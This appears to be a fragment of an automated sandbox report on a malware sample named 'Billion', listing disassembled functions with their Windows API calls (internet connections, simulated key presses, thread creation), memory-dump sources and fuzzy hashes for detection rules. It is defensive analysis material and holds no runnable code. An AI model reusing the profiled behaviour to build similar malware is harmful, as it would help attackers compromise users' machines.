                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1fcfc50aa2616490fdf14d2d90fcdb2ac63c40517bdeaf706cc48d51fe75ea1a
                                                                                                                                                                                                                                                                                                          • Instruction ID: f68e925eca59cc90246258aa002b8b53c013e868f939365a2099b9fdff8288b8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fcfc50aa2616490fdf14d2d90fcdb2ac63c40517bdeaf706cc48d51fe75ea1a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E26138B1F00701AFDB25AF79FC95AAD7BA4EF12760F04016DE844EB282DB3198208791
                                                                                                                                                                                                                                                                                                          Function 001ACB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001ACBC7
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001ACBDA
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 001ACBEE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001ACC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001ACCB7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001ACC98: GetLastError.KERNEL32 ref: 001ACD67
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001ACC98: SetEvent.KERNEL32(?), ref: 001ACD7B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001ACC98: InternetCloseHandle.WININET(00000000), ref: 001ACD86
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 38d4f47b82b0561e69fca77e38cf0a39b8612321a76d80a41d8d8cda11417101
                                                                                                                                                                                                                                                                                                          • Instruction ID: bee3f401922c9185e674265859d376059b887b0a5606fd4f01c8ebd56a7e6757
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38d4f47b82b0561e69fca77e38cf0a39b8612321a76d80a41d8d8cda11417101
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0631AF75100B01AFDB218FB5DD44AABBBF8FF06324B00452DF95A82A10CB31E854EBA0
                                                                                                                                                                                                                                                                                                          Function 00192EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001943AD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: GetCurrentThreadId.KERNEL32 ref: 001943B4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00194393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00192F00), ref: 001943BB
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00192F0A
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00192F28
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00192F2C
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00192F36
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00192F4E
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00192F52
                                                                                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00192F5C
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00192F70
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00192F74
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4177f94e69a4587adfb9a69680229bda848ae29b7ec8986a7b87e6a613f13ef8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 516ddfcc4d8da40c2087fc318cd0bc40910bdfa8b9b63255dec75f634e702460
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4177f94e69a4587adfb9a69680229bda848ae29b7ec8986a7b87e6a613f13ef8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8401D830784224BBFB1067689C8AF593F59EB5DB11F120025F358AE1E0C9F25444CAA9
                                                                                                                                                                                                                                                                                                          Function 00192150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00191D95,?,?,00000000), ref: 00192159
                                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00191D95,?,?,00000000), ref: 00192160
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00191D95,?,?,00000000), ref: 00192175
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00191D95,?,?,00000000), ref: 0019217D
                                                                                                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00191D95,?,?,00000000), ref: 00192180
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00191D95,?,?,00000000), ref: 00192190
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00191D95,00000000,?,00191D95,?,?,00000000), ref: 00192198
                                                                                                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00191D95,?,?,00000000), ref: 0019219B
                                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,001921C1,00000000,00000000,00000000), ref: 001921B5
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 56840f6c262a76003530c3e1237d6e0cfb2fef51087121382ac3f748a647fc82
                                                                                                                                                                                                                                                                                                          • Instruction ID: c607e74ba768e20fe5f8c90737a0907cdb50a4953152e9c5f143b9e4a441aea7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56840f6c262a76003530c3e1237d6e0cfb2fef51087121382ac3f748a647fc82
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA01A8B5640344BFEA10ABA5EC49F6B7BACEB88711F454425FA05DB5A1CA70D840CA20
                                                                                                                                                                                                                                                                                                          Function 0019CE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001341EA: _wcslen.LIBCMT ref: 001341EF
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0019CF99
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019CFE0
                                                                                                                                                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0019D047
                                                                                                                                                                                                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0019D075
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                                          • String ID: ,* $0$<*
                                                                                                                                                                                                                                                                                                          • API String ID: 1227352736-1325340096
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3bda65d5cd709a4bcc8fdf2fe7760d2af747fede409a8db0db58285e4a3bffff
                                                                                                                                                                                                                                                                                                          • Instruction ID: 45b538f6a0ff2cc37fb216a7cd684ab93a2babee79ebc3b9bc6ec852f3b2146d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bda65d5cd709a4bcc8fdf2fe7760d2af747fede409a8db0db58285e4a3bffff
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E51F1316043009BDB14AF28E889B6BBBE8AF99314F080A2DF995D31D1DB70CD49C792
                                                                                                                                                                                                                                                                                                          Function 001C4322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001C43C1
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001C43D6
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001C43F0
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C4435
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 001C4462
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001C4490
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: SysListView32
                                                                                                                                                                                                                                                                                                          • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                                          • Opcode ID: 792899f3c57c0601564d9615aa1a9537d2dd909c064ddf7f4196d9aba3bf9552
                                                                                                                                                                                                                                                                                                          • Instruction ID: a0ad2ef293c78336d021fabebbceeb54b8daea7dd68ec676c6d820f6825cb08a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 792899f3c57c0601564d9615aa1a9537d2dd909c064ddf7f4196d9aba3bf9552
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D41AC71A04319ABDF21DF64CC49FEA7BA9FB68360F10012AF958E7291D774D980CB90
                                                                                                                                                                                                                                                                                                          Function 0019C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0019C6C4
                                                                                                                                                                                                                                                                                                          • IsMenu.USER32(00000000), ref: 0019C6E4
                                                                                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0019C71A
                                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32(00C15120), ref: 0019C76B
                                                                                                                                                                                                                                                                                                          • InsertMenuItemW.USER32(00C15120,?,00000001,00000030), ref: 0019C793
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                                          • String ID: 0$2
                                                                                                                                                                                                                                                                                                          • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                                          • Opcode ID: 572944f05360408039c426b2c28b9e0dcbea1d9dc25ad470ddd8a3f2b8275b2c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 481e01e5a3d166c41ec722f4e46e9f6c5e9379c2ff42350534fb19797cb2e6a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 572944f05360408039c426b2c28b9e0dcbea1d9dc25ad470ddd8a3f2b8275b2c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51B070A00205ABDF18CFF8D9C4BAEBBF5AF59314F24412AE99197291D3709945CFE2
                                                                                                                                                                                                                                                                                                          Function 00131B00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • BeginPaint.USER32(?,?,?), ref: 00131B35
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00131B99
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00131BB6
                                                                                                                                                                                                                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00131BC7
                                                                                                                                                                                                                                                                                                          • EndPaint.USER32(?,?,?,?,?), ref: 00131C15
                                                                                                                                                                                                                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00173287
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131C2D: BeginPath.GDI32(00000000), ref: 00131C4B
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 3050599898-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 85c7314640d4cbdbc988caab4f41d456752fb09a6c207b9d78e614fa2a94c0d3
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2605438bebcdaffff387fcc9fabf9505219f63018e3529675f2036a8ad545b01
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85c7314640d4cbdbc988caab4f41d456752fb09a6c207b9d78e614fa2a94c0d3
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C141A170205304EFD711DF24EC88FB67BB8EF55324F140669FAA9872A2C7319949DB62
                                                                                                                                                                                                                                                                                                          Function 001C86FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001C8740
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 001C8765
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001C877D
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 001C87A6
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,001AC1F2,00000000), ref: 001C87C6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 001C87B1
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2294984445-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: a9ba0a944e55f3064bcc54e45888d12e543e92491c42e8ac7fde1860ff227952
                                                                                                                                                                                                                                                                                                          • Instruction ID: dd914a317396d2f0ca9d4e75a64076ebda5a9c4ef2d3098cb97d5b8f0772df61
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9ba0a944e55f3064bcc54e45888d12e543e92491c42e8ac7fde1860ff227952
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A214A72610355EFCB189F38DC88F6A3BA5EB95365F25463EE926C25E0EB30C850CB10
                                                                                                                                                                                                                                                                                                          Function 0019D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 0019D1BE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconLoad
                                                                                                                                                                                                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                          • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                                          • Opcode ID: 55cc82ba7abe9a4c2d7bde1511014a0439a3cd72e586bb5887cf2535ca1908d5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9e37b949dac32981b39ded19d724f02b777c3fb0fa23a43373027327617b642c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55cc82ba7abe9a4c2d7bde1511014a0439a3cd72e586bb5887cf2535ca1908d5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B911DA3765C30AFBEB056B94FC82D7A77EC9F25765B21003AFA01AA1C1D7B4AA404261
                                                                                                                                                                                                                                                                                                          Function 0019E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                          • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                          • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                                          • Opcode ID: 539ec1f63a475e907867d516fd21641ac3bfdfa2ad9828eeb8f293d91789afda
                                                                                                                                                                                                                                                                                                          • Instruction ID: e4a78eced759b42b638341f01ce5e591ab991069788165016e7676478499fa47
